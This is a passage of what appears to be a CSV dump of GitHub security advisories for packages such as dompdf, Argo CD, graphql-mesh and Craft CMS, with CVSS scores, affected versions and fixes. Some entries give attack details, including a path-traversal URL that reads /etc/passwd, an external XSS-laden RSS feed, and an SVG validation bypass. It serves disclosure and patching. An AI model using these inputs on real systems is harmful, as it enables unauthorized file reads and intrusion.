['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T02:17:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-p6m6-9j36-vfjx,2023-05-25T16:55:03Z,2023-05-16T18:30:15Z,,['CVE-2023-31890'],glazedlists XML Deserialization vulnerability,An XML Deserialization vulnerability in glazedlists v1.11.0 allows an attacker to execute arbitrary code via the BeanXMLByteCoder.decode() parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.glazedlists:glazedlists'}, 'versions': ['1.11.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31890'}, {'type': 'WEB', 'url': 'https://github.com/glazedlists/glazedlists/issues/709'}, {'type': 'PACKAGE', 'url': 'https://github.com/glazedlists/glazedlists'}, {'type': 'WEB', 'url': 'https://github.com/glazedlists/glazedlists/blob/e0593e338246945dab4e83356ef44a59db172a80/extensions/io/src/main/java/ca/odell/glazedlists/impl/io/BeanXMLByteCoder.java'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:48:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-qpgm-gjgf-8c2x,2023-06-02T23:52:23Z,2023-05-26T13:55:00Z,,['CVE-2023-33195'],Craft CMS XSS in RSS widget feed,"### Summary A malformed RSS feed can deliver an XSS payload ### PoC Create an RSS widget and add the domain https://blog.whitebear.vn/file/rss-xss2.rss The XSS payload will be triggered by the title in tag `` Resolved in https://github.com/craftcms/cms/commit/b77cb3023bed4f4a37c11294c4d319ff9f598e1f ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.4.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.4.5'}}]","[{'type': 'WEB', 'url': 'https://github.com/craftcms/cms/security/advisories/GHSA-qpgm-gjgf-8c2x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33195'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/b77cb3023bed4f4a37c11294c4d319ff9f598e1f'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/releases/tag/4.4.6'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-26T13:55:00Z', 'nvd_published_at': None}" 1.4.0,GHSA-pp8m-prr7-wr8w,2023-05-17T03:23:08Z,2023-05-16T18:30:16Z,,['CVE-2023-32985'],Jenkins Sidebar Link Plugin vulnerable to Path Traversal,"Jenkins Sidebar Link Plugin allows specifying files in the `userContent/` directory for use as link icons. Sidebar Link Plugin 2.2.1 and earlier does not restrict the path of files in a method implementing form validation. This allows attackers with Overall/Read permission to check for the existence of an attacker-specified file path on the Jenkins controller file system. Sidebar Link Plugin 2.2.2 ensures that only files located within the expected `userContent/` directory can be accessed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:sidebar-link'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32985'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3125'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:23:08Z', 'nvd_published_at': None}" 1.4.0,GHSA-6mhc-hqr3-w466,2023-06-06T20:28:06Z,2023-05-12T00:30:18Z,2023-06-06T20:28:06Z,['CVE-2023-31508'],Duplicate Advisory: PrestaShop Cross-site Scripting vulnerability,"## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-95hx-62rh-gg96. This link is maintained to preserve external references. ## Original Description A cross-site scripting (XSS) vulnerability in PrestaShop v1.7.7.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the message parameter in /contactform/contactform.php.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/prestashop'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.7.7.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31508'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/PrestaShop'}, {'type': 'WEB', 'url': 'https://github.com/mustgundogdu/Research/blob/main/PrestaShop/ReflectedXSS_1.7.7.4.md'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:19:08Z', 'nvd_published_at': None}" 1.4.0,GHSA-hgv6-w7r3-w4qw,2023-05-30T20:07:06Z,2023-05-30T20:07:06Z,,[],Kyverno vulnerable due to usage of insecure cipher,"### Summary Insecure 3DES ciphers are used which may lead to exploitation of the [Sweet32 vulnerability](https://sweet32.info/). Specifically, the ciphers TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (secp256r1) and TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) are allowed. See CVE-2016-2183. This is fixed in Kyverno v1.9.5 and v1.10.0 and no known users have been affected. ### Details The ciphers in affected versions can be read using the following command which uses `nmap`: ```sh $ kubectl exec -it mypod -n kyverno sh kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead. **nmap -sV --script ssl-enum-ciphers -p 443 kyverno-cleanup-controller** or **nmap -sV --script ssl-enum-ciphers -p 443 kyverno-svc** Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-26 10:55 UTC Nmap scan report for kyverno-cleanup-controller (10.103.199.233) Host is up (0.000058s latency). rDNS record for 10.103.199.233: kyverno-cleanup-controller.kyverno.svc.cluster.local PORT STATE SERVICE VERSION 443/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) | ssl-enum-ciphers: | TLSv1.2: | ciphers: **| TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C** | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A | TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A | TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (secp256r1) - A **| TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C** | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 2048) - A | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A | TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 2048) - A | compressors: | NULL | cipher preference: client | warnings: | 64-bit block cipher 3DES vulnerable to SWEET32 attack | TLSv1.3: | ciphers: | TLS_AKE_WITH_AES_128_GCM_SHA256 (ecdh_x25519) - A | TLS_AKE_WITH_AES_256_GCM_SHA384 (ecdh_x25519) - A | TLS_AKE_WITH_CHACHA20_POLY1305_SHA256 (ecdh_x25519) - A | cipher preference: server |_ least strength: C Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.72 seconds ```",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/kyverno/kyverno'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/kyverno/kyverno/security/advisories/GHSA-hgv6-w7r3-w4qw'}, {'type': 'WEB', 'url': 'https://github.com/kyverno/kyverno/pull/7308'}, {'type': 'PACKAGE', 'url': 'https://github.com/kyverno/kyverno'}, {'type': 'WEB', 'url': 'https://github.com/kyverno/kyverno/releases/tag/v1.9.5'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-30T20:07:06Z', 'nvd_published_at': None}" 1.4.0,GHSA-j2wh-wrv3-4x4g,2023-02-16T18:41:07Z,2023-02-16T18:41:07Z,,[],Unwanted access to the entire file system vulnerability due to a missing check in `staticFiles` HTTP handler,"### Summary Missing check vulnerability in the static file handler allows any client to access the files in the server's file system ### Details When `staticFiles` is set in the `serve` settings in the configuration file, the following handler doesn't check if `absolutePath` is still under the directory provided as `staticFiles`; ```ts if (staticFiles) { router.get('/:relativePath+', async request => { let { relativePath } = request.params; if (!relativePath) { relativePath = 'index.html'; } const absolutePath = path.join(baseDir, staticFiles, relativePath); if (absolutePath.includes(staticFiles) && (await pathExists(absolutePath))) { const readStream = fs.createReadStream(absolutePath); return new Response(readStream as any, { status: 200, }); } return undefined; }); ``` ### Example scenario To reproduce it, set `staticFiles` to the relative path of a directory in `.meshrc.yml`; ```yml serve: staticFiles: ./public ``` Then start the server with `mesh dev`, and browse to `/..%2fpackage.json` then you will see the content of `package.json`. You can even go deeper to see sensitive data; `/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd` ### Impact and solution If `staticFiles` is set under `serve` in the configuration file. you have two options to fix vulnerability; - Update `@graphql-mesh/cli` to a version higher than `0.82.21`, and if you use `@graphql-mesh/http`, update it to a version higher than `0.3.18` - Remove `staticFiles` option from the configuration, and use other solutions to serve static files. ### Credits Thanks [alanwillms@gmail.com](mailto:alanwillms@gmail.com) for reporting this vulnerability with details","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@graphql-mesh/cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.78.0'}, {'fixed': '0.82.22'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@graphql-mesh/http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.19'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Urigo/graphql-mesh/security/advisories/GHSA-j2wh-wrv3-4x4g'}, {'type': 'WEB', 'url': 'https://github.com/Urigo/graphql-mesh/commit/95d93e7c140c2995b37e9d822aa3fe4e24ed2e78'}, {'type': 'PACKAGE', 'url': 'https://github.com/Urigo/graphql-mesh'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T18:41:07Z', 'nvd_published_at': None}" 1.4.0,GHSA-32jc-9p58-p82x,2023-03-02T18:16:20Z,2023-02-17T21:30:41Z,,['CVE-2023-23923'],Moodle Improper Access Control vulnerability,"The vulnerability was found Moodle which exists due to insufficient limitations on the ""start page"" preference. A remote attacker can set that preference for another user. The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.19'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0'}, {'fixed': '3.11.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-beta'}, {'fixed': '4.0.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0-beta'}, {'fixed': '4.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23923'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2162549'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=443274#p1782023'}, {'type': 'WEB', 'url': 'http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-76862'}]","{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-02T18:16:20Z', 'nvd_published_at': '2023-02-17T20:15:00Z'}" 1.4.0,GHSA-3cw5-7cxw-v5qg,2023-02-01T01:37:56Z,2023-02-01T01:37:56Z,,['CVE-2023-23924'],Dompdf vulnerable to URI validation failure on SVG parsing,"### Summary The URI validation on dompdf 2.0.1 can be bypassed on SVG parsing by passing `` tags with uppercase letters. This might leads to arbitrary object unserialize on PHP < 8, through the `phar` URL wrapper. ### Details The bug occurs during SVG parsing of `` tags, in src/Image/Cache.php : ``` if ($type === ""svg"") { $parser = xml_parser_create(""utf-8""); xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, false); xml_set_element_handler( $parser, function ($parser, $name, $attributes) use ($options, $parsed_url, $full_url) { if ($name === ""image"") { $attributes = array_change_key_case($attributes, CASE_LOWER); ``` This part will try to detect `` tags in SVG, and will take the href to validate it against the protocolAllowed whitelist. However, the `$name comparison with ""image"" is case sensitive, which means that such a tag in the SVG will pass : ``` ``` As the tag is named ""Image"" and not ""image"", it will not pass the condition to trigger the check. A correct solution would be to strtolower the `$name` before the check : ``` if (strtolower($name) === ""image"") { ``` ### PoC Parsing the following SVG file is sufficient to reproduce the vulnerability : ``` ``` ### Impact An attacker might be able to exploit the vulnerability to call arbitrary URL with arbitrary protocols, if they can provide a SVG file to dompdf. In PHP versions before 8.0.0, it leads to arbitrary unserialize, that will leads at the very least to an arbitrary file deletion, and might leads to remote code execution, depending on classes that are available. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'dompdf/dompdf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dompdf/dompdf/security/advisories/GHSA-3cw5-7cxw-v5qg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23924'}, {'type': 'WEB', 'url': 'https://github.com/dompdf/dompdf/commit/7558f07f693b2ac3266089f21051e6b78c6a0c85'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/dompdf/dompdf/CVE-2023-23924.yaml'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-3cw5-7cxw-v5qg'}, {'type': 'PACKAGE', 'url': 'https://github.com/dompdf/dompdf'}, {'type': 'WEB', 'url': 'https://github.com/dompdf/dompdf/releases/tag/v2.0.2'}]","{'cwe_ids': ['CWE-551', 'CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-01T01:37:56Z', 'nvd_published_at': '2023-02-01T00:15:00Z'}" 1.4.0,GHSA-86rf-38v8-9c4x,2023-02-16T17:39:11Z,2023-02-09T15:30:27Z,,['CVE-2023-0759'],privilege chaining in cockpit-hq/cockpit,Privilege Chaining in GitHub repository cockpit-hq/cockpit prior to 2.3.8.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cockpit-hq/cockpit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0759'}, {'type': 'WEB', 'url': 'https://github.com/cockpit-hq/cockpit/commit/78d6ed3bf093ee11356ba66320c628c727068714'}, {'type': 'PACKAGE', 'url': 'https://github.com/Cockpit-HQ/Cockpit'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/49e2cccc-bb56-4633-ba6a-b3803e251347'}]","{'cwe_ids': ['CWE-268'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-09T19:30:04Z', 'nvd_published_at': '2023-02-09T14:15:00Z'}" 1.4.0,GHSA-q82h-q47j-f492,2023-03-01T01:48:46Z,2023-02-18T00:31:59Z,,['CVE-2022-48115'],Cross-site Scripting in jspreadsheet,The dropdown menu in jspreadsheet before v4.6.0 was discovered to be vulnerable to cross-site scripting (XSS).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jspreadsheet-ce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48115'}, {'type': 'WEB', 'url': 'https://github.com/jspreadsheet/ce/issues/1587'}, {'type': 'PACKAGE', 'url': 'https://github.com/jspreadsheet/ce'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-18T02:18:38Z', 'nvd_published_at': '2023-02-17T22:15:00Z'}" 1.4.0,GHSA-pj97-r83v-vj7f,2023-02-08T16:14:45Z,2023-02-01T06:30:28Z,,['CVE-2023-0608'],Microweber contains Cross-site Scripting,Cross-site Scripting (XSS) - DOM in GitHub repository microweber/microweber prior to 1.3.2.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'microweber/microweber'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0608'}, {'type': 'WEB', 'url': 'https://github.com/microweber/microweber/commit/20df56615e61624f5fff149849753869e4b3b936'}, {'type': 'PACKAGE', 'url': 'https://github.com/microweber/microweber'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/02a86e0d-dff7-4e27-89d5-2f7dcd4b580c'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T16:58:27Z', 'nvd_published_at': '2023-02-01T06:15:00Z'}" 1.4.0,GHSA-rmw8-7823-wp7f,2023-02-15T21:59:44Z,2023-02-08T09:30:24Z,,['CVE-2023-0742'],Answer contains Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0742'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/c3001de52af91f09c96e701facbce0b9fa0c98ad'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d73a2c03-7035-453b-9c04-c733ace65544'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:35:27Z', 'nvd_published_at': '2023-02-08T08:15:00Z'}" 1.4.0,GHSA-76r7-h46w-463r,2023-02-15T18:17:22Z,2023-02-15T18:17:22Z,,[],Cross Site Scripting (XSS) in Model\DataObject\Data\UrlSlug,"### Impact An attacker can use XSS to send a malicious script to an unsuspecting user. ### Patches Update to version 10.5.17 or apply this patch manually https://github.com/pimcore/pimcore/pull/14301.patch ### Workarounds Apply https://github.com/pimcore/pimcore/pull/14301.patch manually. ### References https://huntr.dev/bounties/75bc7d07-46a7-4ed9-a405-af4fc47fb422/",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.17'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-76r7-h46w-463r'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:17:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-r3vq-92c6-3mqf,2023-04-28T22:06:24Z,2023-02-16T15:30:28Z,2023-02-23T16:57:49Z,[],Duplicate advisory: Sequelize - Unsafe fall-through in getWhereConditions,"## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of [GHSA-vqfx-gj96-3w95](https://github.com/advisories/GHSA-vqfx-gj96-3w95). This link is maintained to preserve external references. ## Original Description Due to improper parameter filtering in the sequalize js library, can a attacker peform injection.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@sequelize/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.0-alpha.20'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22579'}, {'type': 'WEB', 'url': 'https://csirt.divd.nl/CVE-2023-22579'}, {'type': 'WEB', 'url': 'https://csirt.divd.nl/DIVD-2022-00020/'}]","{'cwe_ids': ['CWE-843'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-23T16:57:49Z', 'nvd_published_at': '2023-02-16T15:15:00Z'}" 1.4.0,GHSA-3jfq-742w-xg8j,2023-02-16T20:47:25Z,2023-02-16T20:47:25Z,,['CVE-2023-23947'],Users with any cluster secret update access may update out-of-bounds cluster secrets,"### Impact All Argo CD versions starting with v2.3.0-rc1 are vulnerable to an improper authorization bug which allows users who have the ability to update at least one cluster secret to update any cluster secret. The attacker could use this access to escalate privileges (potentially controlling Kubernetes resources) or to break Argo CD functionality (by preventing connections to external clusters). #### How the Attack Works Argo CD stores [cluster access configurations](https://argo-cd.readthedocs.io/en/stable/operator-manual/declarative-setup/#clusters) as Kubernetes Secrets. To take advantage of the vulnerability, an attacker must know the server URL for the cluster secret they want to modify. The attacker must be authenticated with the Argo CD API server, and they must be authorized to update at least one ([non project-scoped](https://argo-cd.readthedocs.io/en/stable/user-guide/projects/#project-scoped-repositories-and-clusters)) cluster. Then they must craft a malicious request to the Argo CD API server. #### Removing Deployment Restrictions A cluster Secret's `clusterResources` field determines whether Argo CD users may deploy cluster-scoped resources to that cluster. The `namespaces` field determines the namespaces to which Argo CD users may deploy resources. You can use this command to determine whether any of your cluster configurations employ these restrictions (replace `argocd` with the namespace of your Argo CD installation): ```shell kubectl get secret -n argocd -l 'argocd.argoproj.io/secret-type=cluster' -ojson | jq '.items | map(.data |= with_entries(.value |= @base64d)) | # base64-decode secrets map(select(.data | ( (.clusterResources != null and .clusterResources == ""false"") or # we deny cluster-scoped resource management (.namespaces != null and .namespaces != """") # we are only managing certain clusters )) | .metadata.name)' ``` The `clusterResources` and `namespaces` fields are one line of defense against unauthorized management of Kubernetes resources. Users should also have AppProject and RBAC restrictions in place. If `clusterResources: ""false""` or `namespaces: ""some,namespaces""` are the _only_ mechanisms preventing an attacker from maliciously managing certain resources via Argo CD, then this vulnerability could allow that attacker to manage out-of-bounds resources via Argo CD (create, get, update, delete). #### Modifying Connection Parameters Cluster secrets also hold client configuration for connecting to the remote cluster. One option is to skip TLS certificate verification. An attacker could disable certificate verification in an effort to achieve a malicious-in-the-middle (MITM) attack. Alternatively, an attacker could apply an invalid configuration (for example, by setting an invalid bearer token) and achieve a denial-of-service by preventing Argo CD from managing the target cluster. #### Changing Unscoped Clusters to be Scoped The vulnerability also allows an attacker to modify a previously-unscoped cluster and make it [scoped](https://argo-cd.readthedocs.io/en/stable/user-guide/projects/#project-scoped-repositories-and-clusters). This is important if you are using `permitOnlyProjectScopedClusters: true` in a project under which the attacker can deploy. By scoping a previously-unscoped cluster under that project, they can grant themselves the ability to manage resources on the target cluster. ### Patches A patch for this vulnerability has been released in the following Argo CD versions: * v2.6.2 * v2.5.11 * v2.4.23 * v2.3.17 ### Workarounds The best way to mitigate the vulnerability is to upgrade. The following two sections explain other ways to mitigate the vulnerability if you are currently unable to upgrade. #### Limit Users with Cluster Update Access The only complete mitigation besides upgrading is to modify your RBAC configuration to completely revoke all `clusters, update` access. To exploit this vulnerability, an attacker must have access to update at least one cluster configuration. Check your [RBAC configuration](https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac/), for lines like this: ``` p, role:developers, clusters, update, *, allow p, role:developers, clusters, *, *, allow p, role:developers, *, update, *, allow ``` Revoke `clusters, update` access for any users who do not absolutely need that access. #### Restrict Resource Management via AppProjects and RBAC [AppProjects](https://argo-cd.readthedocs.io/en/stable/user-guide/projects/#projects) are a primary tool to restrict what resources may be managed via Argo CD. You can use the `destinations` and `clusterResourceWhitelist` fields to apply similar restrictions as the `namespaces` and `clusterResources` fields described above. ```yaml apiVersion: argoproj.io/v1alpha1 kind: AppProject spec: destinations: # Only allow Applications managed by this AppProject to manage to the `allowed-namespace` namespace. - namespace: 'allowed-namespace' server: 'https://your-server' # Do not allow Applications managed by this AppProject to manage any cluster-scoped resources. clusterResourceWhitelist: [] ``` Along with adding AppProject restrictions, make sure that your RBAC restrictions are strict enough. For example, limit `projects, update` access to Argo CD administrators only. Also use the `{project}` field in `applications, *, {project}/{application}` field to limit users' access to certain, restricted, AppProjects. AppProject restrictions can only prevent Applications from managing out-of-bounds resources. It cannot prevent an attacker from maliciously changing cluster connection TLS configuration. ### For more information * Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions) * Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.17'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.23'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/security/advisories/GHSA-3jfq-742w-xg8j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23947'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/commit/fbb0b99b1ac3361b253052bd30259fa43a520945'}, {'type': 'PACKAGE', 'url': 'https://github.com/argoproj/argo-cd'}]","{'cwe_ids': ['CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T20:47:25Z', 'nvd_published_at': '2023-02-16T18:15:00Z'}" 1.4.0,GHSA-q9p5-w2v9-6wxf,2023-02-08T22:42:01Z,2023-02-01T12:32:41Z,,['CVE-2023-24977'],Apache InLong contains Out-of-bounds Read vulnerability,Out-of-bounds Read vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick https://github.com/apache/inlong/pull/7214 to solve it.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:inlong'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'last_affected': '1.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24977'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7214'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 